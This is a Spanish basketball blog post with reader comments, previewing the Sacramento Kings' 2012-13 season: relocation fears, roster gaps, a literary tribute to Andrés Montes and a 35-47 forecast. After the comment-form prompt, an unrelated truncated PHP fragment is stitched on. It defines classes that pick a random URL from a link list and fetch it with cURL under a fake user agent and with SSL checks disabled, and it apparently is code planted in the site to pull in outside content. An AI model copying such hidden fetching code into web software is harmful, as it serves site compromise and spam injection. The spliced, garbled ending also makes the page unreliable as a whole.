Sacramento Kings: Mensaje en una botella

01 de October de 2012 por Sancho88

“El futuro es ese periodo de tiempo en el que prosperan nuestros negocios, nuestros amigos son verdaderos y nuestra felicidad segura.”

Estas palabras se le atribuyen al periodista estadounidense Ambrose Bierce, un lobo estepario del Siglo XIX al servicio del gran magnate por antonomasia de la historia del periodismo Randolph Hearst. Fueron pronunciadas hace más de un siglo. Qué más quisieran los Kings poder hacer suya esta leyenda y más cuando a principios de marzo se anunció a bombo y platillo un acuerdo que les vinculaba con la NBA por 30 años más. La ilusión vestía con la camiseta de Sacramento. El futuro estaba ahí, en la capital de California. Pero el futuro a veces es esquivo y caprichoso y el papel verde lo es todo hoy en día en estos negocios del señor. Así como vino la ilusión de seguir, con proyectos como el Sacramento Arena o la remodelación del propio Arco Arena, se desvaneció pocos días después por culpa del hermano George, que se erigió como el Maloof obediente con los últimos reductos de una gran herencia (que hoy en día ya no existe), y paró la máquina antes de que ésta devorase sus últimos billetes. Fue una decisión respetable a todas luces, pero la aquiescencia de David Stern con esta banda de empresarios ha sido el silencio definitivo para un equipo que se desvanece. Al menos, tal y como lo conocemos los fans noventeros. Esa era la idea, construir algo mastodóntico fuese como fuese, o desplazar al equipo de las vacas y los cencerros a un lugar más acogedor, a un mercado mayor, como se suele decir (intención real de Stern).

El plan B se posiciona como la opción más viable ahora mismo. El traslado del equipo parece inminente y novias vestidas de blanco esperando en el altar no van a faltar. La última en sumarse oficialmente ha sido Seattle con el anuncio de un estadio que va a costar 500 millones de dólares. Pero ya durante el verano los sufridos aficionados de los Kings descubrieron un lugar llamado Virginia Beach, que apareció en sus pesadillas como Freddy arrancando tímpanos en Elm Street. Por no hablar de la sureña Anaheim, de Las Vegas, etc.

Probablemente Sacramento vaya a escribir esta temporada su último capítulo en este gran circo. 2013 puede ser un año de despedidas, y tenía que caer en 13 precisamente… Con más ilusión que realidad, los dueños han vendido un proyecto con aspiraciones a Playoffs que solo se creen ellos mismos y es que son muchos los defectos de un equipo que, eso sí, seguro que va a ofrecer espectáculo ya que su idiosincrasia en ese aspecto sigue intacta. Es imposible obviar la falta alarmante de centímetros en la zona, de un recambio de garantías para Cousins, de mucha más actitud defensiva desde el perímetro y de defensa al hombre alto de los rivales. Falta trabajar defensa en transición y defensa de pick and roll. En definitiva, falta todo atrás. Por algo fueron el equipo que más puntos recibió el año pasado.

Dicho esto, salvo la incorporación de James Johnson en el puesto de alero, que viene a cubrir el puesto de alero alto defensor vacío en el equipo desde la salida de Ron Artest, y la llegada vía draft de Thomas Robinson, se puede decir que el equipo no ha resuelto prácticamente ninguna de sus principales taras del año pasado. Cousins sigue sin tener un recambio de garantías, ya que Hayes no te puede asegurar nada más que no sea esfuerzo e intensidad defensiva, y en ataque te trastoca cualquier planteamiento porque no puedes hacer nada con él. Esto es muy perjudicial para los Kings pues los rivales saben buscarle las cosquillas a Cousins, que tiene un verdadero problema con las faltas. De esta manera, la zona no es de garantías a pesar de los avances realizados. Falta el perro grande y Robinson no está muy claro si va a poder adaptarse al tallaje de las bestias fuera de la universidad y si con los mayores también impondrá su dominio característico en los Jayhawks de Kansas. Veremos en qué acaba la incógnita del profesionalismo para Robinson.

Analizada la zona vamos al puesto de alero, en el que Johnson podría tener gran protagonismo junto a Tyreke Evans, si finalmente Smart decide ubicarle en esa posición. Lo que está claro es que los otros cuatro aleros (Salmons, García, Outlaw y Honeycutt) no dan la talla ahora mismo para jugar en la NBA y, para más inri, Salmons y García cobran demasiado. Lo del dominicano no importa porque es expiring y es imposible que el equipo le extienda la team option para el año que viene, pero Salmons tiene aún dos años garantizados más una team option para 2015 (que obviamente, los Kings, o los Royals, o los Supersonics, no ejercerán tampoco en ese momento). Plantear la amnistía tendría sentido. No obstante, los Maloof no tienen ni un duro para cubrir ese espacio salarial con un contrato alto, como por ejemplo el de Granger, y seguir pagando a Salmons aparte sin que este jugase. Geoff Petrie, por decirlo suavemente, la cagó en el intercambio de Beno Udrih a los Bucks y ahora les va a tocar seguir pagando a Salmons en Virginia, Anaheim o donde acaben estos señores.

Así que no queda muy claro por quién o quiénes va a apostar Keith Smart para el puesto de alero, pero lo que sí es evidente es que el asunto Thornton-Evans no se ha tocado en todo el verano (como la ley física de atracción de los polos de los imanes, estos dos se repelen que da gusto), que Aaron Brooks viene para quitar minutos a Isaiah Thomas (mejor jugador y en franca progresión), que el equipo sigue confiando en Fredette a pesar de haber acreditado más que de sobra su ineptitud para jugar en liga, y que se ha cometido una gran injusticia al no renovar a Terrence Williams, pues éste más Johnson, habrían armado un buen juego de aleros, con García y Honeycutt llenando las convocatorias o la lista de lesionados, y Salmons ayudando en el puesto de 1-2 junto a Thomas, Evans, Thornton y Fredette. Era más que suficiente con eso, y ese dinero invertido en Brooks se podría haber empleado para alguno de los múltiples aleros agentes libres este verano o para un pívot.

Pero esto es lo que hay. Quien se flipe pensando que los Kings este año sí, que este año van a renacer de sus cenizas como el hígado de Prometeo y van a volver a enamorar en Playoffs y todas esas cosas, que se vaya olvidando. Las loas por Robinson e incluso por Brooks que se han podido llegar a oír son solo fuegos de artificios. Brooks es como Thornton, no vale para jugar en equipo y para armar un proyecto de playoffs, se ha fichado como panacea, para dar una ilusión a la gente, pero no como un fichaje con cabeza. Se ha fichado porque no se podía fichar nada más, porque nadie quiere venir a los Kings, porque no tienen dinero para pagar a nadie. Y Robinson aún está por ver qué puede hacer con gente que le supera con creces en altura y corpulencia, porque él es un luchador y un atleta, sí, pero no hay que olvidar que desde Barkley o Johnson, no funciona lo de camuflarse en la zona con cuerpos de alero. No me da buena pinta.

La realidad es que los dueños no tienen ni un duro, y ningún jugador quiere ir al equipo en esas condiciones, porque les van a chulear con el contrato y no van a poder pagar a nadie que pida más de 10 millones. Este es el problema de fondo y así es imposible armar ningún proyecto con ninguna aspiración seria. Los dueños están arruinados y su capacidad de maniobra es reducidísima.

Toca palmar un año más, aunque eso sí, diversión van a dar, porque con Tyreke, Thornton, Brooks, Fredette, etc. en algún momento supongo que aparecerán dos o tres balones en la cancha, cuando el marcador refleje un 125-110 contra los Suns, por ejemplo.

Y cuentan los más ancianos, que en la orilla llegó una botella, de vidrio algo gastado, un vidrio entre verde oscuro y negro. Un pequeño papel enrollado en cinta dorada fue a parar a las manos del viajero del tiempo. Era una pequeña carta, y no venía sola. La botella estaba alojada en una barquita que vadeaba perdida desde hacía mucho tiempo. Y en letras de morado y púrpura, el viajero pudo leer lo siguiente:

“Aún sueño algún día con hollar las cumbres borrascosas, con comer chocolate blanco y divertirme con estilo como Vittorio Gassman, el comediante. Aún sueño con una película y con un año: 1973 y American Graffiti en mi memoria. Ese año también nació un ilustre, uno de los “Fab Five”, C-Webb. Él define mi legado y mi memoria. Me divierten todavía las últimas escenas del simpático Mr. Magoo, y me declaro un apasionado del deporte y del juego; corro como Morcelli cuando el 1.500 era el 1.500, pues acertadamente me llaman Mr. Fibra. No lo puedo evitar, estoy hecho un Mazas. Y en mis ratos libres, me gusta que me hagan la Manicura. Así, me despido por la eternidad, creo que conseguí divertiros a todos, y llego cruzando desde la barca de Caronte, con este humilde óbolo que traigo en el bolsillo. Hubo un tiempo que fuimos los reyes, el equipo ye-ye, y hoy solo vaga mi alma buscando su fin.”

Andrés Montes cogió la barquita, volvió a enrollar el papel en su cinta dorada, y lo introdujo en la botella. Varias lágrimas surcaron sus mejillas, y con apremiante esfuerzo, se acercó a la orilla y dejó correr a la barquita, que se perdió entre los juncos para siempre.

Quinteto: Isaiah Thomas, Marcus Thornton, Tyreke Evans, Thomas Robinson, Demarcus Cousins
6º hombre: Jason Thompson/Aaron Brooks

Altas: Aaron Brooks (Guandong Southern Tigers), James Johnson (Toronto Raptors), Thomas Robinson (Kansas Jayhawks)
Bajas: Donte Greene (frustrado fichaje de los Brooklyn Nets, debido a una fractura de tobillo), Hassan Whiteside (sin equipo), Terrence Williams (Detroit Pistons)

Previsión: 35-47 (fuera de Playoffs)

Comenta

16 comentarios a esta entrada

  1. Nacho dice:
    #1

    ¿35? El amor a los colores ciega, porque no los puedes mirar de frente.
    El futuro no son más que sueños, y el presente no deja de ser pasado, aunque, a veces y solo a veces, sea más cercano.
    Bonito homenaje, eso sí.

    Propongo un juego para el final de los análisis: Hay un total de 1230 partidos en la regular. Veremos la horquilla de la suma de los análisis, digo que superan esa cifra con creces. LLegamos ya a alturas de empresas demoscópicas, y de ahí a ministro de educación, cualquiera.

      Citar

  2. Denise dice:
    #2

    Había escrito un comentario, pero creo que ha debido de ocurrir un error y no lo veo publicado..

    decía que hay equipos que tienen buen perímetro y mal juego interior o viceversa; pero es que los Kings tienen carencias en todas las lineas, para mi, un top 3 de peores plantillas de la competición.

    Pronóstico: No llegan a 30 victorias. Les doy un balance de 25-57

      Citar

  3. TheDeerHunter dice:
    #3

    Ni idea Denise… te ha marcado como Spam y yo lo he visto de casualidad.

    Yo también les veo de lo peorcito de la liga. 25 victorias siendo generoso.

    El artículo fabuloso, Sancho.

      Citar

  4. simon dice:
    #4

    35 victorias me parecerian todo un logro para estos Kings, que salvo Cousins y lo que pueda aportar Robinson poco mas tienen que ofrecer, ( en Tyreke creo que se podría aplicar el mismo análisis que haces de Thorthon, para un equipo que quiere aspirar a algo la versión actual de Tyreke es un lastre, infimos porcentajes de tiro, malas decisiones, desconectado de los partidos a menudo… es raro pero creo que la mejor versión de este jugador la vimos como Rookie y no va a volver, )
    alcanzar las 30 victorias ya sería un milagro, creo que se moverán entre 22-26 victorias te han tirado demasiado tus colores…

      Citar

  5. simon dice:
    #5

    ten en cuenta sancho que van a ser si o si los ultimos de la conferencia… y no creo que el último del Oeste, por muy fiero que sea este llegue a 35 victorias… maxime cuando Hornets, GSW, Wolves… van para arriba.

      Citar

  6. Sancho88 dice:
    #6

    Seguramente tengáis razón. Hombre, les estamos considerando entre los peores de la liga por sus carencias defensivas. Estoy de acuerdo. Pero ojo, porque ellos son muy jóvenes, pero este año tendrán un año más, y eso debe pesar también para mejorar atrás. Tyreke es bastante buen defensor, y Thomas, Johnson también. Luego, por talento ofensivo, que nadie se relaje porque los Kings van a correr y van a hacer sudar la gota gorda a los rivales. Ya digo, para mí no van a estar en playoffs, eso sería una machada terrible que no creo que ocurra, porque están en el Oeste más salvaje de los últimos años, pero mirad, yo me veo todos sus partidos, y sé a qué pueden aspirar. La mayoría de ellos se les escapan por no estar centrados atrás, por falta de experiencia, por el horrible clutch de Tyreke… (dicen que ha entrenado media y larga distancia, qué van a decir, pero no me creo gran cosa). Diría que no es precisamente algo relacionado con el talento, ni incluso con las individualidades. Supongo que la llegada de Brooks es precisamente para eso, para que se juegue tiros decisivos junto a Thornton. Y podemos hablar largo y tendido de las individualidades, pero el juego de bases y escoltas está bastante bien, hay taltento, juventud y piernas frescas. A mí ese puesto me gusta. Luego veo el de 3 un poco cojo, porque ya digo que no me gusta nada cómo lo tienen configurado, y en la pintura me pasa lo mismo por carencia de centímetros. Un hombre grande les ayudaría mucho, como hizo Dalembert hace dos años. Ahora en el training camp van a probar a Ndiaye, ex de los Wizards. Podría ser válido para intimidar. No me gusta nada Darnell Jackson, que muchos dícen que podrían hacerle ficha, y no me gusta tampoco que exaran a Whiteside.

    Lo dicho, seguramente tengáis razón, si todos opináis que he sobrevalorado las oportunidades de los Kings. De todas formas, es mi pronóstico más optimista, y el más pesimista, no bajaba de 30. Smart tiene trabajo atrás, pero creo que van a conseguir sorprendernos en ese aspecto, ya lo veréis

      Citar

  7. Schize dice:
    #7

    Mi opinión es parecida a la de sancho88, el año pasado no creo que tuvieran mejor equipo y dieron algo de guerra. Si aprovechan su juventud para meter velocidad e intensidad algo podrán hacer, y si tyreke volviera a su año rookie, mas todavía. Con Robinson ya tengo mas dudas.

      Citar

  8. GreenPride dice:
    #8

    Antes de nada fenomenal el análisis de Sancho.
    Yo sinceramente los veo también como de los peores equipos de la NBA. Me gusta Isiah Thomas y Cousins (si se centrara del todo creo que sería la leche). Pero es que tienen lagunas casi en todos sitios y sobre todo nulas ganas de rellenar los huecos. Los dueños están más pendientes de donde mandar el equipo que otra cosa y creo que esto también se notará. Espero una temporada de “se dejaba llevar…” y que vean los playoffs muy de lejos

      Citar

  9. portu dice:
    #9

    Fantástico tu análisis Sancho.
    He echado de menos q nombraras un poquito más a Jason Thompson, y no lo digo pq sea un gran jugador, pero es un tío con cierta actitud defensiva, con buen físico y que creo se complementa bien con Cousins. No creo q empiece el rookie jugando de titular, pero sí q va a estar muchos minutos en cancha. En cualquier caso, sin olvidar lo de las faltas de Cousins, tampoco hay tantos equipos q puedan tener 2 tíos interiores de gran nivel ofensivo y defensivo, hay juegos interiores mucho peores en la NBA que un Cosuins-J. Thompson-T. Robinson-C. Hayes). En general la combinación de 2-3 (ofensivo-defensivo) y de 4-5 (defensivo-ofensivo) me parece que les otorga un buen balance. La clave es ver el nivel real, el nivel máximo de Cousins y Tyreke. Para entrar en playoffs sí q no los veo, pero por poco, al menos en calidad… lo q pasa es q cuando un equipo no tiene opciones de playoffs ya sabemos q aparece pronto el tank mode y entonces sí q puede irse la cosa a 25 victorias o poco más.

      Citar

  10. rumbero dice:
    #10

    portu: Pues yo era de los que se había creído un poco los fuegos de artificio pero ya me habéis quitado la ilusión. Tengo al Brooks que fue MIP con los Rockets como un jugador suficientemente interesante como para poder hacer una buena dupla en con Thomas, y como se dice en el análisis Johnson puede tener un rol en el 3 que no tenía este equipo. A Robinson no lo puedo valorar aún, pero un #5 del draft del que se habla bien es para tenerlo en cuenta.
    Igual el problema está en la inconsistencia del equipo, pero tampoco me parece un roster tan malo Aun así soy de los A ver como les vas…como bien dice portu la progresión de Cousins y el rendimiento de Tyreke pueden hacer variar bastante el nivel real de este equipo, pero seguro que divertiran un rato.

    Coincido bastante contigo, e incluso me había creído un poco los fuegos de artificio de los fichajes pero por aquí ya están quitando la ilusión :D. Tengo al Brooks que fue MIP con los Rockets como un jugador suficientemente interesante como para poder hacer una buena dupla en con Thomas, y como se dice en el análisis Johnson puede tener un rol importante en el 3. A Robinson no lo puedo valorar aún, pero un #5 del draft del que se habla bien es para tenerlo en cuenta. Igual tienen un problema con la consistencia del equipo, pero también me parece un roster con suficiente calidad. Cousins y Thomas no tendrían que hacer otra cosa que mejorar…y Tyreke…bueno…veremos xD En cualquier caso seguro que por lo menos nos regalan entreteniemiento. Gran análisis.

      Citar

  11. melo15 dice:
    #11

    Esta claro que los Kings son un buen equipo, pero con el actual nivel del Oeste yo no les doy Playoffs ni de coña.
    Para mi la clave del equipo es Tyreke Evans, ya sabemos en cierto modo como van a rendir Cousins, Thorton, Isaiah y Robinson pero que va a hacer Evans? Para mi solo si vuelve a el nivel de su temporada rookie ya seria un gran exito y entonces is que veria a los Kings superiores a equipos como Houston, Suns…
    Yo les doy cerca de las 30 victorias pero puede subir o bajar depende de diversos factores.
    PD: Como no espabilen se les van a pirar Cousins, Evans y todos estos jovenes que tienen.

      Citar

  12. Sancho88 dice:
    #12

    Portu, a mi JT me encanta, por lo que tu dices, es actitud pura atras y adelante. Tiene buena cabeza para asistir incluso y atrás pone todo lo que tiene y mas. Quizá tiene altura, pero le falta un poco de empaque, de fuerza bruta como Cousins, de carácter quiza. Pero sí, tiene talento y nunca se esconde, y cuando le dan minutos hace estadísticas como una apisonadora. Se te pone en 10-5 en 6-7 minutos con facilidad. Pero pongo por delante a Robinson porque siempre intento pensar cual va a ser el quinteto según pasen los partidos. Quizá, si Johnson rinde, puede ser una buena pieza de tres con Tyreke de 2 y Thornton y Brooks revolucionando desde el banquillo.

    Seguramente, Thomas, Evans, Johnson, Robinson y Cousins sea el quinteto, y JT no le pongo de quintento porque su rol con Smart es de sexto hombre, de salir cuando Cousins o Robinson se cansen o se carguen de faltas. O eso creo. Incluso el año pasado tuvo que aguantar partidos donde salían antes Greene o Outlaw… aunque al final acabó siendo titular, pero con la elección tan alta de Robinson, supongo que lo querrán de titular.

    Se agradecen mucho los comentarios y saber que muchos seguís a este equipo, jejej

      Citar

  13. MagicJohnson32 dice:
    #13

    A ver qué año nos dan los Kings. Tengo curiosidad por ver a Isaiah, que me encantó el año pasado y espero que le sigan dando la dirección del equipo. Si la bola pasa más tiempo en manos de Thornton o Tyreke, mala señal será.

    No veo esas 35 victorias de ninguna manera, pero quién sabe en un equipo tan joven y con este potencial.

    Y, ante todo… Enhorabuena por el texto, Sancho. Es un estilo arriesgado, que o se hace bien o resulta insoportable de leer. En tu caso es lo primero, divertido y emocionante, fantástico.

      Citar

  14. Sancho88 dice:
    #14

    Yo me las juego, me tiro unos triples impresionantes a las cinco de la mañana, y dejo a juicio de Txus si se puede o no publicar, jeejej. Mis mayores pedos literarios están por venir, no obstante. Muchas gracias Magic por los elogios, me alegro un montón que te haya gustado!!

      Citar

  15. MagicJohnson32 dice:
    #15

    Bueno, aquí hasta dejamos que alguien diga que Pearl Jam son un coñazo, vamos, que se puede decir cualquier cosa, jaja.

    ((Lo cierto es que a mí con la referencia a Hearst y el periodismo de inicios del s. XX me tenías en el bolsillo 😉 ))

      Citar

  16. Sancho88 dice:
    #16

    Los duelos entre Hearst y Pullitzer eran más o menos de la misma intensidad que los de Deer y Denise cuando se ponen a hablar de Nelson y Fisher, jejeje

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>